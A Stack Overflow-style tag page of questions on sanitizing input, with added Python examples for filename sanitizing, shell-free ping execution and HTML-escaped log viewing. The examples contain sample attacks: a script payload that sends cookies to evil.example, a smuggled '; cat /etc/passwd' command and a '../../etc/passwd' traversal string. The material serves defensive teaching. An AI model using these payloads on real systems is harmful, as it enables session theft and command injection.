sanitize

Turn a string into a valid filename in Python

I have a string that I want to use as a filename, so I want to remove all characters that wouldn't be allowed in filenames, using Python. I'd rather be strict than otherwise, so let's say I want to retain only letters, digits, and a small set of other characters like "_-.() ". What's the most elegant solution? The filename needs to be ...
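A strict allowlist sanitizer for the spec in this question, added here as an example and not taken from the post or any answer to it. Beyond dropping disallowed characters it also handles the cases that a character filter alone leaves open: names that become empty, leading dots (hidden files), runs of dots that could survive as "..", trailing dots and spaces (which Windows silently strips), and Windows reserved device names. The NFKD fold and the Windows checks are assumptions about where the files will land, not part of the question.

```python
import re
import unicodedata

# Allowlist from the question: ASCII letters, digits and the characters "_-.() ".
# Anything else is removed. This is an allowlist, not a denylist of "bad" characters.
_DISALLOWED = re.compile(r"[^A-Za-z0-9_\-.() ]")

# Assumption: files may end up on a Windows filesystem, where these stems are
# device names no matter what extension follows them.
_WINDOWS_RESERVED = {
    "CON", "PRN", "AUX", "NUL",
    *(f"COM{i}" for i in range(1, 10)),
    *(f"LPT{i}" for i in range(1, 10)),
}


def sanitize_filename(name: str, max_len: int = 255, default: str = "file") -> str:
    """Return a filename containing only the allowlisted characters.

    Also closes the gaps a bare character filter leaves: path traversal via
    "..", hidden files via a leading ".", empty names, names Windows would
    mangle, and over-long names.
    """
    # Fold Unicode to ASCII where a reasonable equivalent exists ("é" -> "e",
    # fullwidth letters -> ASCII) so accented names degrade instead of vanishing.
    name = unicodedata.normalize("NFKD", name)
    name = name.encode("ascii", "ignore").decode("ascii")
    name = _DISALLOWED.sub("", name)
    # Collapse runs of dots so ".." can never survive (the "/" in "../" is
    # already gone, which would otherwise leave "....etcpasswd" behind), then
    # strip leading dots/spaces (hidden files) and trailing ones (Windows drops
    # them, so "a.txt." and "a.txt" would collide).
    name = re.sub(r"\.{2,}", ".", name).strip(". ")
    if not name:
        name = default
    stem = name.split(".", 1)[0]
    if stem.upper() in _WINDOWS_RESERVED:
        name = "_" + name
    return name[:max_len]
```

The order matters: normalising before filtering keeps the name readable, and collapsing dots after filtering is what stops "../../etc/passwd" from turning into a name that still contains "..". Even with this in place, join the result to a fixed base directory and verify the resolved path stays under it; a filename sanitizer is not a substitute for that check.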

C# Sanitize File Name

I recently have been moving a bunch of MP3s from various locations into a repository. I had been constructing the new file names using the ID3 tags (thanks, TagLib-Sharp!), and I noticed that I was getting a System.NotSupportedException: "The given path's format is not supported." This was generated by either File.Copy() or Directory.Cre...

Rails ActiveRecord: Inserting text containing unprintable/weird characters

I am inserting some text from scraped web into my database. Some of the fields in the string have unprintable/weird characters. For example, if text is "C__O__?__P__L__E__T__E", then the text in the database is stored only as "C__O__" I know about h(), strip_tags()... sanitize, ... etc etc. But I do not want to sanitize this SQL. Th...

jQuery catch paste input

I'm looking for a way to sanitize input that I paste into the browser, is this possible to do with jQuery? I've managed to come up with this so far: $(this).live(pasteEventName, function(e) { // this is where i would like to sanitize my input return false; } Unfortunately my development has come to a screeching halt because of this...

Xcode, Cocoa: Filtering/Sanitizing User Input. Best Approach

To clarify, I want to check for valid characters. For first name, last name I want to check for [A-Za-z]. For Email I want to check for chars valid for email. What algorithm would I use to CHECK user input? Specifically, I'd like to CHECK the user's first name, last name and email address for valid characters before I add to database. ...

Replacing Microsoft Word Newline Character in Python

This feels like it should be an easy one, but I'm having trouble cleaning out the newline character in content pasted from Microsoft Word. Not a full line-break, but the CTRL ENTER character that shows up as a return arrow in Word. I've tried chr(10), chr(13), \u000D, \u000A and a few others, but I can't match it in a string.replace(). S...

Sanitize user input destined for database in PHP

I have this code: $query = "select id from votes where username = '$user' and article_id = $this->id"; I tried this code to sanitize it: $query = sprintf("select id from votes where username = '$user' and article_id = $this->id", mysql_real_escape_string($user), mysql_real_escape_string($password)); but I get this error ...

Best way to sanitize exec command with user-inserted variables.

I'm coding a web interface to a horrible piece of proprietary software our company uses. The software has no real UI and requires us to give PuTTY access to our system for our clients to even pull data. My web interface has to run an exec(); function and it has to pass a few variables the user inputs. $command = "report-call '$type' '$s...

Sanitizing PHP input to ping program.

I would like to interface a php page to the linux command line program ping. I realize that there are sanitization issues. Is there a builtin library or function that can take care of everything, or will I have to rely on regex parsers? ...
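The two questions above (the exec() wrapper and the ping page) are the same problem: user input ends up in a command line. An added example, written in Python rather than PHP and not code from either post, showing the two controls that actually solve it: an allowlist validator that only accepts an IP literal or a well-formed hostname, and passing the command as an argv list so no shell ever parses the input. The helper names, the ping flags and the sample inputs are assumptions for illustration.

```python
import ipaddress
import re
import subprocess

# Hostname label per RFC 1123: alphanumerics and hyphens, no leading or trailing
# hyphen, 1-63 characters. Because a label must start with an alphanumeric,
# option-like values such as "-f" can never validate (argument injection).
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*\.?$")


def validate_target(target: str) -> str:
    """Return target if it is an IP literal or a well-formed hostname, else raise.

    This is an allowlist: shell metacharacters, whitespace, quotes and
    "$(...)" are rejected because they are not part of any valid host,
    not because they appear on a list of dangerous characters.
    """
    target = target.strip()
    if not target or len(target) > 253:
        raise ValueError("empty or overlong target")
    try:
        ipaddress.ip_address(target)  # accepts IPv4 and IPv6 literals
        return target
    except ValueError:
        pass
    if _HOSTNAME.match(target):
        return target
    raise ValueError(f"not a valid host: {target!r}")


def build_ping_argv(target: str, count: int = 3) -> list:
    """Build the argv list for ping. Options come first, the validated host last."""
    count = int(count)  # a non-numeric count raises ValueError here
    if not 1 <= count <= 10:
        raise ValueError("count out of range")
    return ["ping", "-c", str(count), validate_target(target)]


def run_ping(target: str, count: int = 3) -> str:
    """Execute ping without a shell and return its stdout (assumes a Unix ping)."""
    argv = build_ping_argv(target, count)
    # shell=False is the default: argv goes straight to execve(), so there is
    # no shell to interpret ";", "|", "&&", backticks or "$(...)".
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=15)
    return proc.stdout


def unsafe_shell_string(target: str) -> str:
    """The pattern the questions describe: raw input interpolated into a shell line.

    With target = "8.8.8.8; cat /etc/passwd" the shell runs two commands.
    Kept only for contrast; never execute this.
    """
    return f"ping -c 3 {target}"
```

Escaping functions such as escapeshellarg() are the fallback when a shell is unavoidable; they do not help against option injection (a value starting with "-") or against a program that itself re-parses its arguments, which is why validation of the value's shape comes first and the argv list replaces the shell entirely.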

Php safe output

Hello. When outputting user input I use this function: function bbkoda($text) { $text = htmlspecialchars($text); $text = nl2br($text); $hitta = array( "'\[b](.*?)\[/b]'is", "'\[i](.*?)\[/i]'is" ); $byt = array( "<b>\\1</b>", "<i>\\1</i>" ); $text = preg_replace($hitt...

Is it a dangerous thing to view an access log in a web browser without sanitizing it?

Is it a dangerous thing to view an access log in a web browser without sanitizing it? I am considering recording an access log, and I am considering viewing it via a web browser, but if an attacker modifies his remote host or user agent or something, can he attack me? By inserting attack code into his remote host or user agent, etc. So do I ne...
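An added example for the situation this question describes (not code from the post or its answers): the User-Agent and Referer headers are entirely attacker-controlled and are written to the log verbatim, so a page that drops the raw line into HTML executes whatever the client sent. The right place to sanitize is the output, where the data meets the browser, not the log itself, which has to stay unmodified for forensics. The log lines are constructed samples in Combined Log Format; the parser is simplified (it does not handle escaped quotes inside fields).

```python
import html
import re

# Constructed sample log in Combined Log Format. The second line's User-Agent
# is a script payload: the client chose that header, and the server logged it as-is.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 2326 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /?q=1 HTTP/1.1" 200 51 "-" "<script>fetch('//evil.example/'+document.cookie)</script>"
"""

_FIELDS = ("host", "time", "request", "status", "size", "referer", "agent")

_LINE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)


def parse_line(line: str) -> dict:
    """Split one Combined Log Format line into its fields (simplified grammar)."""
    m = _LINE.match(line)
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    return m.groupdict()


def render_log_html(log_text: str) -> str:
    """Render log lines as an HTML table, escaping every field at output time.

    html.escape() turns <, >, &, " and ' into entities, so the payload in the
    User-Agent is displayed as text instead of being parsed as markup.
    """
    rows = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        cells = "".join(f"<td>{html.escape(rec[k], quote=True)}</td>" for k in _FIELDS)
        rows.append(f"<tr>{cells}</tr>")
    return "<table>\n" + "\n".join(rows) + "\n</table>"


def render_log_naive(log_text: str) -> str:
    """The version the question is worried about: raw log text inside HTML."""
    return "<pre>" + log_text + "</pre>"
```

The same principle applies to any other viewer: a terminal interprets ANSI escape sequences in the log, and a spreadsheet interprets a leading "=" as a formula, so each output context needs its own escaping rather than a one-time cleanup of the stored record.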

How to sanitize user input in PHP before mailing?

I have a simple PHP mailer script that takes values from a form submitted via POST and mails them to me: <?php $to = "[email protected]"; $name = $_POST['name']; $message = $_POST['message']; $email = $_POST['email']; $body = "Person $name submitted a message: $message"; $subject = "A message has been submitted"; $headers = 'From: ' ....

User input, PHP, Javascript and security

Hi, I am working on a directions service where users enter the from and to addresses and get the directions table ( that gives turn by turn information ) along with a map showing the route. Below is the complete source code ( getdirections.php ): <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtm...

Sanitize SQL in custom conditions

I need to create a simple search but I can't afford to use Sphinx. Here's what I wrote: keywords = input.split(/\s+/) queries = [] keywords.each do |keyword| queries << sanitize_sql_for_conditions( "(classifications.species LIKE '%#{keyword}%' OR classifications.family LIKE '%#{keyword}%' OR ...

How best to sanitize rich html with rails?

Hi there, I'm looking for advice on how to clean submitted html in a web app so it can be redisplayed in future without styles or unclosed tags wrecking the layout of an app. On my app rich HTML is submitted by users with YUI Rich text editor, which by default runs a few regexps to clean the input, and I'm also calling the [filter_M...

Strip Inline CSS and JavaScript in Rails

I'm working on a Rails application and I would like to know what's the best way to strip blocks of CSS or JavaScript. <style> ... </style> -or- <script> ... </script> I'm using the *strip_tags* helper to take care of most of the HTML, but it leaves a bunch of CSS when the content contains inline CSS. Thanks ...

To sanitize all user's input in PostgreSQL by PHP

This question is based on this thread. Do you need the explicit sanitizing when you use pg_prepare? I feel that pg_prepare sanitizes the user's input automatically such that we do not need this $question_id = filter_input(INPUT_GET, 'questions', FILTER_SANITIZE_NUMBER_INT); Context where I use Postgres $result = pg_prepare($dbco...

When to filter/sanitize data: before database insertion or before display?

As I prepare to tackle the issue of input data filtering and sanitization, I'm curious whether there's a best (or most used) practice? Is it better to filter/sanitize the data (of HTML, JavaScript, etc.) before inserting the data into the database, or should it be done when the data is being prepared for display in HTML? A few notes: ...

Is my anti XSS method OK for allowing user HTML in PHP?

I am working on finding a good way to make user submitted data, in this case allow HTML and have it be as safe and fast as I can. I know EVERY SINGLE PERSON on this site seems to think http://htmlpurifier.org is the answer here. I do agree partially. htmlpurifier has the best open source code out there for filtering user submitted H...

Function to Sanitize HTML Id attribute in Java

I have coded the following function. But surely someone has a more elegant way to perform this task. /** * * HTML 4 Specification * ID and NAME tokens must begin with a letter ([A-Za-z]) and may be followed by any number * of letters, digits ([0-9]), hyphens ("-"), underscores ("_"), colons (":"), and periods ("."). * @param s * @re...